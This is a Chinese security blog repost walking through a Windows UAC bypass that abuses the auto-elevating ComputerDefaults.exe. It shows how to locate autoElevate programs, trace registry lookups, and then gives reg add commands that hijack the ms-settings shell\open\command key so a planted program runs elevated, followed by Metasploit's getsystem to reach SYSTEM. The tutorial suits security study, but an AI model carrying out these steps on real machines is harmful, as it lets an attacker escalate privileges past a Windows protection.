Bypass UAC

admin 2024年1月5日00:20:56评论51 views字数 1499阅读4分59秒阅读模式

Bypass UAC

用户账户控制(User Account Control,UAC)是Windows操作系统采用的一种控制机制,开启UAC后,每个需要用管理员访问令牌的应用都需要用户同意。UAC限制所有的用户,包括非RID 500的管理员用户,RID 500是指除了Administrator以外,位于管理员组的其他管理员用户。

绕过UAC,可以使非RID 500的账户可以不需要用户同意直接使用管理员访问令牌。UCA是一种保护机制,Bypass UAC就是绕过这一保护机制,本质上不算是提权。

UAC白名单

UAC给一些系统程序设置了白名单,不用询问,可以直接提升到管理员权限运行。寻找白名单程序时,可以用微软提供的工具Sigcheck和Strings。

地址如下:

https://learn.microsoft.com/zh-cn/sysinternals/downloads/sigcheck

https://learn.microsoft.com/en-us/sysinternals/downloads/strings

白名单程序有一个共同的=特点,Manifest数据中autoElevate属性值为True。

Sigcheck工具检测程序是否有autoElevate属性,ComputerDefaults.exe为例。

sigcheck.exe -accepteula -m C:WindowsSystem32ComputerDefaults.exe

Bypass UAC

Strings可以找出所有具有autoElevate属性的程序。

strings.exe -accepteula -s C:WindowsSystem32*.exe |find /i "autoElevate"

下面通过ComputerDefaults.exe程序绕过UAC实现提权。

使用Process Monitor监控ComputerDefaults.exe程序。

1、筛选,可执行文件路径不是C:WindowsSystem32ComputerDefaults.exe的全部排除。

Bypass UAC

2、启动ComputerDefaults.exe程序,捕获ComputerDefaults.exe进程行为。

Bypass UAC

3、一般以Shellopencommand命名的注册表中,存储的可能是可执行文件的路径,继续筛选,显示路径包含Shellopencommand的进程。

Bypass UAC

4、分析发现,ComputerDefaults.exe会先查询注册表HKCUSoftwareClassesms-settingsShellopencommand中的数据,发现该路径不存在,然后继续查询HKCRms-settingsShellOpenCommandDelegateExecute中的数据并读取。

Bypass UAC

5、执行以下命令

reg add HKCUSoftwareClassesms-settingsshellopencommand /d "C:Windowstemptest.exe" /f

reg add HKCUSoftwareClassesms-settingsshellopencommand /v DelegateExecute /t REG_SZ /d "C:Windowstemptest.exe" /f

C:WindowsSystem32ComputerDefaults.exe

Bypass UAC

运行ComputerDefaults.exe时,恶意程序会绕过UAC以提升的权限运行,kali上线msf,运行getsystem命令,提升至SYSTEM权限。

Bypass UAC

总结

愿大家健康开心。


原文始发于微信公众号(AlertSec):Bypass UAC

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月5日00:20:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Bypass UAChttps://cn-sec.com/archives/2365891.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息